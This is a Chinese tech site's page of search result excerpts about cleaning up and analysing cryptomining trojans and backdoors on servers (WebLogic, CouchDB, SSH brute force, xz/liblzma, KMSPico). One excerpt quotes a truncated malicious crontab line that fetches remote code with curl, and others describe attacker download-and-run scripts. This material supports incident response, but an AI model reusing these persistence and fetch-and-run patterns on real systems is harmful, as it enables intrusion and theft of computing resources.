首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

主机植入木马后的应急响应思路

姜老师作为一个老江湖,怎么就能让这么一个不正经的程序在自己的主机上运行起来? 按理说我们这时候应该列出各种图表和操作命令系统截图,来溯源整个入侵的过程,辅助大家理解整个事件的前因后果。...通过网页的漏洞,经过一系列的提权,将木马程序植入到服务器。这是一种比较常见的入侵。特别是在各种云厂商的服务上。 其实每家云服务厂商都有自己的防护系统。...但即使有这些防护系统,云主机入侵的概率也是不小的。姜老师面临一个比较尴尬的局面就是。业务用了一个很老的电商软件。用软件提供的功能来,支撑他们的业务运转。但可能是因为一个祖传代码。...当下掉这个业务的主机。把不正经的程序拷贝到新的主机环境下。这个进程也是无法被杀掉。会不断的重启。可能短时间内我们无法对老的系统进行版本的升级。所以首要的任务要把老业务恢复生命。重新提供服务。...将木马放入沙箱,分析结果显示这是一个中威木马程序。对于所有挂在外网的服务来说,扫描和入侵的可能都是存在的。我们几乎每天都会面临这样的问题。

93021

服务器植入挖矿木马cpu飙升解决

排查过程 我以 150+ 的手速立即打开了服务器,看到 Tomcat 挂了,然后顺其自然的重启,启动过程中直接 killed,再试试数据库,同样没成功,多次尝试甚至重启机器无果。...这是谁运行的程序?不管三七二十一先杀掉再说,因为它就是 Tomcat 等程序启动不了的元凶。 然而并没有什么卵用,过一会再看那个东西又跑出来占 CPU。怀疑是个定时任务: ? 什么鬼,是个图片?...启动 Tomcat 等程序,大功告成!...等等,这远远不够,考虑到能拿去挖矿的前提下你的服务器都已经被黑客入侵了,修复漏洞才对,不然你杀掉进程删掉文件后,黑客后门进来 history 一敲,都知道你做了啥修复手段。...遇到挖矿木马最好的解决方式:将主机镜像、找出病毒木马、分析入侵原因、检查业务程序、重装系统、修复漏洞、再重新部署系统。

2.1K10
您找到你想要的搜索结果了吗?
是的
没有找到

【警惕】大量未修复WebLogic WSAT组件RCE漏洞的主机挖矿程序攻击

警惕 从1月1日开始,大量未修复WebLogic WSAT(全称:Web Services Atomic Transactions)组件RCE漏洞的主机挖矿程序攻击,尤其是1月3日,更是大面积爆发,...该脚本首先会杀掉本机上的python和java程序,然后下载运行比特币的挖矿程序xmrig-y(xmrig-y.exe,该程序多款杀毒软件标示为挖矿或恶意木马程序),然后伪装成java文件运行,接着执行一个...while true的循环,在满足相应的条件时,杀掉主机相关进程。...请删除目前主机上的应用包(或mv改个名字),然后将一份安全的应用包上传到怀疑攻击的主机上,重新部署一下应用。...JDK自身的XMLDecoder进行反序列化漏洞攻击,下载并运行比特币的挖矿程序

1.4K60

Linux服务器植入木马挖矿该怎么处理解决

很多客户网站服务器入侵,攻击,找到我们SINE安全公司寻求技术支持与帮助,有些网站篡改,跳转,首页内容替换,服务器植入木马后门,服务器卡顿,服务器异常网络连接,有的客户使用的是阿里云服务器,经常被提醒服务器有挖矿程序...,安全的处理时间也需要尽快的处理,根据我们的处理经验,我们总结了一些服务器攻击,被黑的排查办法,专门用来检查服务器第一时间的安全问题,看发生在哪里,服务器是否被黑,是否攻击,那些篡改等等。...如何排查服务器攻击?...对服务器的启动项进行检查,有些服务器植入木马后门,即使重启服务器也还是攻击,木马会自动的启动,检查linux的init.d的文件夹里是否有多余的启动文件,也可以检查时间,来判断启动项是否有问题。...最重要的是检查服务器的定时任务,前段时间某网站客户中了挖矿病毒,一直占用CPU,查看了定时任务发现每15分钟自动执行下载命令,crontab -l */15 * * * * (curl -fsSL https

5.6K30

Couchdb权限绕过和任意命令执行植入挖矿程序入侵分析

dbappsecurity.com.cn 有偿投稿,记得留下你的姓名和联系方式哦~ 事件概述 我们捕获了利用Couchdb权限绕过漏洞的攻击行为,攻击者通过创建管理员帐户,之后利用Couchdb任意命令执行漏洞执行下载恶意脚本,植入挖矿恶意程序...应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。...主要功能是从http://***.99.142.232:8220下载一个配置文件1.json 并重命名,下载了rig、rig1、rig2三个样本并重命名,赋予了可执行权限,然后获取了受害主机的cpu核数...,把配置文件内容和cpu核数作为参数执行suppoie这个程序 config.json 内容如下: ?...根据配置文件内容判断这是一个门罗币的挖矿样本,使用的是XMRig开源程序,查了一下这个钱包地址帐户因僵尸网络活动报告而暂停。 ?

1K30

揭秘:黑客利用Couchdb数据库中漏洞植入挖矿程序

事件概述 我们捕获了利用Couchdb权限绕过漏洞的攻击行为,攻击者通过创建管理员帐户,之后利用Couchdb任意命令执行漏洞执行下载恶意脚本,植入挖矿恶意程序。...应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。...主要功能是从http://***.99.142.232:8220下载一个配置文件1.json 并重命名,下载了rig、rig1、rig2三个样本并重命名,赋予了可执行权限,然后获取了受害主机的cpu核数...,把配置文件内容和cpu核数作为参数执行suppoie这个程序 config.json 内容如下: ?...根据配置文件内容判断这是一个门罗币的挖矿样本,使用的是XMRig开源程序,查了一下这个钱包地址帐户因僵尸网络活动报告而暂停。 ?

74050

SSH僵尸主机挖矿木马预警

一旦暴力破解成功,攻击者远程下载并运行挖矿程序 下图是一个挖矿木马后台服务器的截图,从图中可以看出116.196.120.20这台服务器从2018年1月26日14点开始,xm.sh(下载器程序)已经下载过...这段代码包括了三部分: · 攻击者首先杀掉其他的挖矿程序,来保证自身的收益。注:黑产中的竞争也是越来越激烈了。 · 远程下载服务器上对应的挖矿程序。 · 配置好矿池以及钱包地址,执行挖矿程序。...4.程序1.ps1是windows平台下类似xm.sh的脚本程序,同样实现类似的三个功能,首先kill其他的挖矿程序,然后远程下载服务器上对应的的挖矿程序,最后配置好矿池以及钱包地址,执行挖矿程序。...但由于矿池判定为僵尸网络非法挖矿,该钱包剩余的7个XMR已被冻结: ?...从目前掌握的情报,综合溯源到的10多台服务器访问信息、钱包地址,该攻击者目前至少已经控制了3万多台主机,获取了约300多个门罗币,以目前的XMR(门罗币)价格已近10万美元。

1.3K90

记一次服务器植入挖矿木马CPU飙升200%解决过程

好尴尬,但是心思细腻的我早知道没这么简单,肯定只是伪装,crul 过去是下面的脚本,过程就是在挖矿: #!...启动Tomcat等程序,大功告成!...等等,这远远不够,考虑到能拿去挖矿的前提下你的服务器都已经被黑客入侵了,修复漏洞才对,不然你杀掉进程删掉文件后,黑客后门进来 history 一敲,都知道你做了啥修复手段。...http://blog.jobbole.com/94518/ 最好的方式:将主机镜像,找出病毒木马,分析入侵原因。检查业务程序,重装系统,修复漏洞,再重新部署系统。...写在最后, 网友提供的一劳永逸终极解决办法: 把你自己的挖矿脚本挂上去运行,这样别人就算挂脚本也跑不起来了,互相伤害啊

1.8K20

记一次服务器植入挖矿木马CPU飙升200%解决过程!

此项目是我负责,我以150+的手速立即打开了服务器,看到Tomcat挂了,然后顺其自然的重启,启动过程中直接killed,再试试数据库,同样没成功,多次尝试甚至重启机器无果。...启动Tomcat等程序,大功告成!...等等,这远远不够,考虑到能拿去挖矿的前提下你的服务器都已经被黑客入侵了,修复漏洞才对,不然你杀掉进程删掉文件后,黑客后门进来history一敲,都知道你做了啥修复手段。...滔哥给提供了最好的方式:将主机镜像、找出病毒木马、分析入侵原因、检查业务程序、重装系统、修复漏洞、再重新部署系统。...写在最后 网友提供的一劳永逸终极解决办法: 把你自己的挖矿脚本挂上去运行,这样别人就算挂脚本也跑不起来了。

1.3K20

原荐记一次服务器植入挖矿木马cpu飙升200%解决过程

此项目是我负责,我以150+的手速立即打开了服务器,看到Tomcat挂了,然后顺其自然的重启,启动过程中直接killed,再试试数据库,同样没成功,多次尝试甚至重启机器无果。...好尴尬,但是心思细腻的我早知道没这么简单,肯定只是伪装,crul过去是下面的脚本,过程就是在挖矿: #!...启动Tomcat等程序,大功告成!...等等,这远远不够,考虑到能拿去挖矿的前提下你的服务器都已经被黑客入侵了,修复漏洞才对,不然你杀掉进程删掉文件后,黑客后门进来history一敲,都知道你做了啥修复手段。...滔哥给提供了最好的方式:将主机镜像。找出病毒木马,分析入侵原因。检查业务程序。重装系统。修复漏洞。再重新部署系统。

1.5K40

话题讨论 | 关于网页植入挖矿代码的探讨

最近上网浏览网页的时候发现电脑CPU有升高,但是也在 70%以下,以为是后台运行一些更新程序什么的,结果没想到抓包一看是挖矿脚本! 数据包如下: ?...v=1”这个JS文件其实是一个挖矿脚本,来源于一个在线挖矿网站ppoi.org ,类似于著名的coinhive,与之前暴力简单的嵌在正常网页中的挖矿JS相比,作者设置了setThrottle ,线程应保持空闲的时间百分比...由referer头可以看出是由99e3.com这个域名跳转来的,目前推测有两种情况:该域名被黑,嵌入跳转的JS 脚本;或者该域名和上面跳转的域名newscdn.ysw365.com为同一个作者,其作用仅仅是用作执行挖矿脚本的诱饵...这与挖矿网站的二级域名一致,可以得出结论:网站作者利用诱饵网站进行钓鱼,采用诱惑性内容诱导用户点击相关资讯,从而调用挖矿脚本为作者牟利。 ?...newscdn.ysw365.com的Whois信息阿里云隐私保护,无法追溯,99e3.com的 Whois信息如下: ?

1.6K90

linux服务器植入ddgs、qW3xT.2挖矿病毒的处理实战记录

前言 随着虚拟货币的疯狂炒作,挖矿病毒已经成为不法分子利用最为频繁的攻击方式之一。...病毒传播者可以利用个人电脑或服务器进行挖矿,具体现象为电脑CPU占用率高,C盘可使用空间骤降,电脑温度升高,风扇噪声增大等问题。...本文主要介绍的是关于linux植入ddgs、qW3xT.2挖矿病毒的处理方法,下面话不多说了,来一起看看详细的介绍吧 入侵后的现象: 发现有qW3xT.2与ddgs两个异常进程,消耗了较高的cpu,kill...这样即使存在未授权访问,也能够给攻击者使用config 指令加大难度 3.如果可以在防火墙中屏蔽redis外网 入侵方式: 收集了相关资料,了解到其是利用redis漏洞,未设置密码或密码太简单,导致的入侵

78910

威胁告警:大量ubnt设备植入后门

我们通过技术手段对恶意服务器进行了控制,通过远程桌面进入后我们发现这台主机的8000端口与其他很多ip都已经建立了网络通讯 ? 随机打开几个ip,发现都是 ubnt 的设备! ?...从图片中可以看出:它正在监听端口是 8000,已经被黑客控制的主机数量有 564 台. 8000端口也是与我们使用“netstat”查看的结果相符合!...取证回来的相关的恶意文件后,我们发现了植入ubnt设备的工具是叫“linux命令批量执行工具” ? 这里的植入恶意程序的命令和在与我们在客户设备上见到的是一样的!...推测出整个攻击流程如下: 暴力破解存在弱口令的22端口 调用shell命令植入后门 黑客发送指令到入侵的设备后进行攻击 我们从黑客的扫描后保存的结果来看,大量的ubnt设备存在弱口令,(黑客暴力破解时使用的用户名和密码就是...我们随机尝试了几个设备发现都存在默认弱口令,并且多台设备多次对植入不同URL的蠕虫 初步统计的URL包括过有: ? 并且包含恶意URL不停在变化(备注:并未全部包括!)

1.5K60

Linuxkdevtmpfsi 挖矿病毒入侵

Linuxkdevtmpfsi挖矿病毒入侵 一....错误信息 二.解决问题 1.首先停掉kdevtmpfsi的程序 2.删除Linux下的异常定时任务 3.结束kdevtmpfsi进程及端口占用 4.删除掉kdevtmpfsi的相关文件 三.怎么预防处理这个病毒...有个最大的问题是:top命令查看自己服务器CPU运行情况,会发现kdevtmpfsi的进程,CPU使用率为100%,第一次删除干净了kdevtmpfsi程序,没曾想几分钟以后,就出现了第二个警告。...1.首先停掉kdevtmpfsi的程序 ps aux 找到kdevtmpfsi的进程 删除掉与kdevtmpfsi相关的进程 kill -9 20267 kill -9 20367 2.删除Linux...如有错误,还望指正 发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/138680.html原文链接:https://javaforall.cn

2.8K20

Xzliblzma 植入源码级后门

谁也没想到, Xz/liblzma会被植入后门程序,据说微软连夜加班处理本次后门事件,主流云厂商们也都在加急排查风险和安全修复。...进一步溯源发现SSH使用的上游liblzma库植入了后门代码,恶意代码可能允许攻击者通过后门版本的SSH非授权获取系统的访问权限。...(具体细节还在分析中) 4.只要是同时使用了 liblzma和 OpenSsH的程序就会受到影响,最直接的目标就是 sshd,使得攻击者可以构造特定请求,绕过密钥验证远程访问。...一位安全研究人员注意到了,顺藤摸瓜发现了这个阴谋并报告给 oss-security,致使此事败露。...如果不是因为这个 Bug,那么这么后门有不低的概率并入主流发行版的stable 版本,恐怕会是一件前所未有的重大安全事件。

74760

这种新型挖矿可能盯上你主机

门罗币的这种特性导致了其被黑产大量使用,目前宙斯盾流量安全分析系统捕获的大部分挖矿脚本都是在进行门罗币的挖矿活动,一旦服务器恶意攻击者植入门罗币挖矿脚本,最突出的表现就是CPU使用率大幅升高。...我们在六月份监测到了Chia与Swarm相关的挖矿脚本,并且感染量在几天内从数十台增加到了数百台,其中Swarm占据了大部分。...,最主要的特征是消耗带宽和硬盘空间,如果在日常使用电脑的过程中发现了硬盘空间突然大量占用并且有一个程序占用了大量的网络带宽,则可以去查看下是否植入了Swarm挖矿木马。...Swarm挖矿程序与XDAI区块链节点进行的通信流量如下: [17576051cb5a87aa58fc36dae5f7ae49.png] 如上图可以看出,在挖矿程序与交换端点进行通讯时,同样采用了jsonrpc...通过检测上述端口的开放与连接情况也能了解主机是否运行了Swarm挖矿程序Bee。

68020

白嫖党小心了,热门Windows激活软件KMSPico植入恶意程序

据The Hacker News网站报道,一种名为CryptBot的恶意程序正伪装成时下热门的Windows系统第三方激活工具——KMSPico。...CryptBot是一种信息窃取程序,能够获取浏览器cookie、加密货币钱包、信用卡凭证,并从受感染的系统中捕获屏幕截图。...研究人员分析发现,该恶意程序由CypherIT 打包程序进行包装,可混淆安装程序以防止其安全软件检测到。...然后,此安装程序会启动一个同样经过严重混淆的脚本,该脚本能够检测沙箱和 AV仿真,因此在研究人员的设备上运行时不会执行。...即使KMSPico没有所谓真正的官方网站,不法分子仍在四处传播所谓来自“官方”的软件版本,用户一旦采信,就会落入圈套,而且植入恶意程序后的KMSPico也能和正常版本一样激活系统。

1.1K20
领券